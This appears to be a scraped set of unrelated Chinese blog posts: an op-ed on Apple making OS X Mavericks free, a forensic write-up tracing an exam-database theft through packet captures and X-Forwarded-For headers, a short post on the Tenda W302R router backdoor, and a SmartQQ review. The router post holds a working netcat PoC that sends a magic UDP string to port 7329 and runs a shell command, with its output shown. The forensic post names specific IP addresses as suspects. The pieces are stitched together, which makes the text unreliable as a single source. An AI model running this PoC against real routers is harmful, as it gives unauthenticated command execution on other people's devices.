苹果系统免费?微软,你不必紧张

在上周苹果对外宣布了其最新的OS X免费,这在业界引起了不小波动,有人认为这将给微软OS业务带来伤害,影响真有这么大吗?微软是否需要应战?如果不需,苹果OS免费效应又为什么如此大?另外,OS未来究竟会不会免费?

上周苹果在旧金山芳草地艺术中心举行了发布会,一共90分钟的发布会,苹果在Mac上就用了60分钟,而在这60分钟里苹果又宣布了令许多人比较意外的消息——最新发布的OS X Maveriks免费。

正是这则消息,在业界引起了不小波动,不少媒体纷纷对苹果的免费之举叫好,为微软Windows而担忧,出现了诸如《苹果重视PC市场,Mac或将战胜微软Windows》、《苹果营造软件免费趋势,欲撼动微软现金牛根基》以及《苹果最新免费Mac OS 给微软Windows造成了巨大伤害》等观点比较偏颇的文章,当然也有一些比较客观的文章出现,比如《为什么苹果的Mac软件不是真正的免费》等,但这种理性回归的文章依然是少数。

对这种信息“不对称性”的报道,本不愿跟风写文评论一笑而过时,突然想起一位已逝去的一位老师曾说过,越是炒得热的新闻越应该关注,因为这是热点,用户需要了解真相……于是,便有了这篇评论——《苹果系统免费?微软,你不必紧张》。

苹果系统的免费,对微软影响很小?

一篇文章,不管秉持的是什么观点或看法,用户心中升起的第一个疑问必定是——为什么?是的,苹果系统免费,微软为什么不必紧张?

1.免费≠开放:首先要讲的是,苹果掀不起多大波澜,有些人太高看苹果了,因为苹果的系统只是免费,并不是开放,它的系统只能在Mac上使用,除了Mac之外,普通的PC根本无法使用Mac OS,因此苹果系统的免费,只能在小众的自家设备上折腾,对普通PC用户毫无意义(别较真地谈黑苹果,因为这没多大意义)。在这里也许有读者会认为,或许苹果日后会开放Mac OS?这可能吗?Mac OS若开放,高价Mac还会有人买吗?

2.系统免费,并不是用户或企业购买IT产品的判断标准:用户或企业是否购买某款产品,依据的判断标准并不是这款产品是非常便宜或免费,而是这款产品能否解决自己的实际需求,比如有些专业软件只能在Windows上运行,难道用户会因为iOS的免费,而去购买iPad吗?当然需求相同时,用户倾向于选择那些物美价廉的产品,只是,系统“免费”就真的能让你免去一笔费用吗?请继续往下看。

3.免费是建立在昂贵的基础上:一台普通PC只要三千元,而一台苹果电脑最便宜的就要七八千,一台苹果电脑的价格相当于PC好几台,这便宜吗?另外,这七八千的价格中已经包含了系统费用。其次,微软Windows虽然收费,但对用户造成的感受并不大,因为大多数情况下,购买的新PC会自带新系统,这使得用户对操作系统费用非常模糊,有的用户觉得三千左右的电脑已经很便宜,而对隐含的Windows价格就更没感觉了。

4.从某种意义上来说,微软也在提供免费升级服务:对Windows 8用户而言,实际上微软也间接开始提供系统免费升级服务,比如用户能够从Windows 8升级到Windows 8.1就是一个案例,只不过这种免费的系统升级带有一定的局限性而已。

从以上角度来看,苹果系统免费之举,对微软造成的影响真的很小,那为什么影响如此之小,但造成的舆论却这么大?

苹果系统免费效应为什么如此之大?

苹果在发布会上刚宣布OS X Maveriks免费,台下的观众以及IT媒体非常惊喜和意外,微博和IT网站上也开始奔走相告苹果系统的免费,免费效应如此之大,给人的感觉好像微软的Windows收费是多么的万恶不赦,而苹果系统免费,却是多么的大得人心。

实际上免费效应如此之大的原因,并非是人们对Windows收费之举的憎恶,而是因为苹果产品一向定位高端,价格高高在上,突然宣布某个收费的产品现在免费了,这自然会成为媒体的焦点,并被大众过分解读。

苹果系统免费,微软是否需要“应战”?

既然苹果系统免费造成舆论影响这么大,那微软是否需要做出应对,或者跟风苹果之举?要想知道这点,就先来看看苹果对系统免费的原因有哪些?

1.苹果主要依靠硬件赚钱 软件免费影响不大:虽然苹果是一家软硬结合的公司,但软件只是苹果实现差异化的手段之一,它更多的是依靠设计优秀和做工精良的硬件来赚钱,苹果有软件,但基础是硬件,并且大部分收入也都来自于硬件之上,所以操作系统免费对苹果影响并不大。

2.苹果系统免费 主要是想以后通过服务继续圈钱:苹果系统为什么免费?主要原因是能够减少系统碎片化,统一用户体验,并能让用户使用上最新的iCloud等服务,而在未来,苹果也必然能够发掘并通过这些服务来继续赚钱。

从以上两点来看,苹果操作系统免费之举无疑是一种移花接木,取悦消费者的一个高级营销手段而已,但在这两方面,对于微软而言却是非常的不一样:

1.软件仍然是微软的主要收入:去年,微软Windows部门共获得192.3亿美元的收入,这与苹果通过Mac获得的软件收入相比,高的不止一点半点。

2.两家系统价值偏重不一样:由于Mac上App Store的完善和iTunes,使得苹果生态系统的价值远远大于操作系统的价值,而在这一点上,微软恰恰相反。

综上来看,由于两家公司实际情况存在天差万别,再加上苹果系统免费对微软造成的影响并不大,微软无需对此作出应对。

以镜为鉴可正衣冠,苹果系统免费微软应该得到的启示

虽然苹果系统免费,对微软的影响并不大,但通过免费苹果能够提供统一的用户体验,这样不仅能解决系统碎片化的问题,还能够降低开发成本,让开发者更加专注,从而能够为用户提供更加独特的软件体验,而这又会进一步地促进用户的黏性。

其次,苹果免费背后的理念是非常好的——在操作系统之外,其实还有更多的价值可以追求,微软应该更多地去挖掘生态系统方面的价值,而不要只关注系统层面的所得,因此在Windows Phone上,微软是否有必要调整战略,向苹果学习?

最后一个疑问:操作系统,未来会不会免费?

看到这里,或许大家都非常关心一点:操作系统未来会不会免费?实际上,操作系统的免费是一种趋势,笔者在《未来Chrome OS或取得Android般成功》一文中曾指出,未来的计算时代是云时代,那时候的人们都将使用“云服务”来进行生产和创新,而众多软件公司的盈利模式也将是通过提供“云服务”(云的应用服务)来维持生存,那个时候的操作系统将起入口作用,系统的本质则类似于Chrome OS,而为了能够成为云计算时代的核心系统,系统的免费将是必然,因为只有免费才能推动其成为入口。

[法客二周年]看我如何取证抓出黑阔!

大家都在写日站过程,我就放出一篇抓日站的过程,哈。 

开个玩笑,实例取证过程,大家都懂的,所以严格打码,见谅~~

2099年13月33日某市某局考试报名服务器遭受了两次攻击,都是被直接下载了数据库。
下载数据库的行为是通过后台合法下载,因此,在之前的证据调查中被忽略了。

取证分析:起初,我们通过安装在考试网服务器上抓包工具抓到的数据包,导入科莱数据分析软件,转化成明文显示从而进行下一步分析,如图所示
图1
(科莱Colasoft Capsa 7 版本:7.3.1 Build 2436)
<ignore_js_op>QQ截图20131022191309.png
再以Excel格式导出,以IP排序,搜索大量连续访问的IP,搜索排出敏感url,查询是否有木马后门,或者上传操作页面等。如图2
图2
“图片漏点-已屏蔽”
<ignore_js_op>2.png
所有抓包日志分析下来,无任何可疑后门url,发现大量自动化扫描工具的扫描痕迹,均无入侵成功痕迹。

我们尝试寻找网站程序漏洞,没有注入漏洞,发现一处问题,用户可查询其他用户资料,但前提需要知道ID生成规则,如:
http://x.x.x.x/08104/ks_left.act ... f04013bac0f9b1c01d6
于是我们分析查询所有数据包日志,发现如下几个IP的ID查询登录次数与时间很可疑,
<ignore_js_op>3.png
<ignore_js_op>4.png
<ignore_js_op>5.png
221.136.152.195和 202.105.247.6这两个IP是浙江宁波联通的IP,一直有操作,以上是登录查询记录。
经分析只有两种可能:
1.他利用tables.id轮循出其他考生信息
2.不知道他怎么获得其他考生的登录密码,他反复登录
一个IP 多次登录本身就有异常,怀疑是XX考试一条龙服务公司,但一般做这行的公司基本都是本地,
宁波可能性不大,我们和人事局沟通分析他们怀疑是代考团队。
这算我们意外发现的一个漏洞,经过调查,这些线索无法定性,不确定算不算攻击。

我们怀疑入侵者很可能合法通过后台直接登录直接拿走数据,或者有服务器权限,通过和某某局机房负责人协商
,我们登录服务器进行网站程序排查,未发现任何后门木马,并从网站程序了解到数据库使用access数据库,
数据库文件名为*.mdb,下载页面downloadGJ.action
我们通过关键词mdb以及download进行url排查,发现下载痕迹。
数据包为:
<ignore_js_op>6.png
两次记录分别是:

2013/1/29 8:50        2013/1/29 8:50        218.76.159.133        HTTP        GET http://x.x.x.x/06109/downloadGJ.action(湖南省郴州市 电信)

2013/1/29 8:35        2013/1/29 8:35        61.181.22.157        HTTP        GET http://x.x.x.x/06109/downloadGJ.action(天津市 联通ADSL)
2013/01/28 08:44:59   61.152.108.187    HTTP      POST http://x.x.x.x/06109/exportdataGJ.action

我们使用数据分析软件打开2013/1/29/8:35 2013/1/29/8:44的数据包
找到downloadGj.action,如图6所示
图6:
<ignore_js_op>7.png
定位到此IP,点数据包选项,搜索定位到downloadGj.action,如图7所示
图7:
<ignore_js_op>8.png
8中
分析:在图8中,发现了此IP直接进行了TCP三次握手,然后径直访问了数据库后台下载页面,执行了下载操作。如图8所示
图8
<ignore_js_op>10.png
在图9中,是本次连接的二进制解码信息。可看到是执行了数据库下载。
<ignore_js_op>11.png
图10
在图三中,是后续的下载二进制数据的解码信息,可看到就是某某局考试报名数据库的表结构,后面分了几十个包下载,共计19M。
<ignore_js_op>12.png
图10

(注:IP地址是通过互联网查到的物理位置,未必准确,希望公安进一步核实)

经过进一步调查,发现218.76.159.133和61.181.22.157都是HTTP代理服务器。

为了穿透代理追求真实IP,我方对数据包的包头进行了二进制解码,定位到downloadGJ.action,证据图11
<ignore_js_op>13.png
从上图得知HTTP包头中追到了代理源IP地址,即来自于218.76.159.133攻击行为的源IP为221.223.70.137。
<ignore_js_op>1~.png
图11
灰色部分未记录了代理源IP的HTTP包头数据,翻译过来就是:X-Forwarded-For:
221.223.70.137

证据图12中二进制编码解析得到显示数据库的字段
<ignore_js_op>2~.png
如下证据图,通过二进制解码,可看到下载内容,
<ignore_js_op>3~.png
<ignore_js_op>4~.png
我们又用相同的方法解析了来自61.152.108.187的数据包,根据解析的数据,这次也执行了下载,真实IP也是221.223.70.137

这个真实IP每天早晨8点40左右开始下载数据。

经过三次下载行为判断,应该是同一人所为:

我们在二进制包里解析出了访问者的计算机配置:
CPU:AMD64
浏览器:IE9
操作系统:Windows 7 x64

进入途径:
我们查询http://x.x.x.x/06109/exportdataGJ.action定位到该数据包,证据图12
图12
<ignore_js_op>!!!.png
黑客直接使用admin的密码登陆,如图13
<ignore_js_op>@!.png
图13

分析建议:
建议联系当地某部门锁定这个IP,如果是家里的ADSL,可直接定位,如果是公司的IP,则可联系公司调取上网行为管理日志。
如没有日志,可通过上面给出的机器配置信息到内部找到配置类似的机器,有可能这个人有自己的笔记本电脑。

找到电脑,注意看还有没有IE访问记录,历史记录是可以保存的,如果对方删除了,历史记录还可以通过Windows隐藏位置调出。

密码泄露途径分析:
1.要么某某局自己人泄露给别人
2.要么黑客自己注入爆出密码
3.要么开发的人设置了一个隐蔽的模块,专门用来偷密码
第一种可能性我这里保留意见,个人认为不可能;
第二种可能性我认为概率不高,我们测试过,并且反编译过程中也观察过,没发现明显的注入问题,这个代码是在一个开源的中间件平台上改的(我们怀疑,看源码的时候感觉有些像,但是不敢完全肯定,他们改动很多),那么如果这上面出问题,也难说;
第三种可能性:如果设置了这个机关,那应该就是在中间件底层设置的,应用层我们都反编译了,没发现这个问题。中间件底层的话,我们如果强行进行反编译,工作量非常大,暂时放弃反编译的工作。

差不多了,以上是一次真实的取证过程,放出来给法客的基友look下,希望大家不要转载到外面!,谢谢~

 

 

本文转自法客

 

Tenda路由器后门,From China,With Love!

同一个网站爆的,只需发送一个udp包,围观地址:

http://www.devttys0.com/2013/10/from-china-with-love/

poc
$ echo -ne "w302r_mfgx00x/bin/ls" | nc -u -q 5 192.168.0.1 7329 drwxr-xr-x 2 0 0 1363 webroot drwxr-xr-x 1 0 0 0 var drwxr-xr-x 5 0 0 43 usr drwxr-xr-x 1 0 0 0 tmp drwxr-xr-x 2 0 0 3 sys drwxr-xr-x 2 0 0 569 sbin dr-xr-xr-x 39 0 0 0 proc drwxr-xr-x 2 0 0 3 mnt drwxr-xr-x 1 0 0 0 media drwxr-xr-x 4 0 0 821 lib lrwxrwxrwx 1 0 0 11 init -> bin/busybox drwxr-xr-x 2 0 0 3 home drwxr-xr-x 7 0 0 154 etc_ro drwxr-xr-x 1 0 0 0 etc drwxr-xr-x 1 0 0 0 dev drwxr-xr-x 2 1000 100 574 bin
博客里面提到的路由器Tenda’s W302R , Tenda W330R, Medialink MWN-WAPR150N.

Smart QQ - 腾讯新一代网页版 WebQQ,更简洁纯粹的实用在线聊天工具!

对于经常在外面跑使用不同电脑的朋友来说,不必下载和安装的网页版QQ是最合适也是最实用的通讯方案,因为无论在哪儿,只要有一个能上网的浏览器即可与QQ好友联系。

经过了一段时间的沉寂,原本的网页版 WebQQ 终于推出了新版本并改名为 SmartQQ!腾讯这次很果断地将之前 WebQQ 各种繁杂的附加功能通通删掉,只留下最重要的聊天功能,相比之前要简洁实用许多!而这次不仅换上了类似手机版 QQ 的界面,聊天方式也改成跟 iPad 平板版本相似,有兴趣的同学不妨体验一下……

SmartQQ - 新版网页版QQ,更纯粹的在线聊天工具:

虽然之前网页版 WebQQ 做得确实很强大,登录后俨然就是一整个网页版的操作系统,有应用市场,可以安装各种网页应用。但实际上,大多数人真正想要的,其实只是一个能聊天的网页QQ工具而已,不过现在看来腾讯终于是开窍了。

SmartQQ 网页版界面截图

新版 SmartQQ 的截图,非常简洁纯粹,界面跟平板版本相似

WebQQ

相比之下,原本的 WebQQ 就显得太杂了,看起来跟的桌面操作系统一样,焦点都不在QQ上面

SmartQQ 作为原 WebQQ 生命的延续和进化,终于将自己变回纯粹的网页版QQ聊天工具而不再是巨大的网页版QQ操作系统了,我也很高兴腾讯终于在产品上做减法而不再只是加法,这对于经常需要使用网页版QQ的朋友来说绝对是一件好事不是么?SmartQQ 的详细介绍就免了,大家自行体验吧。

访问 SmartQQ 网页版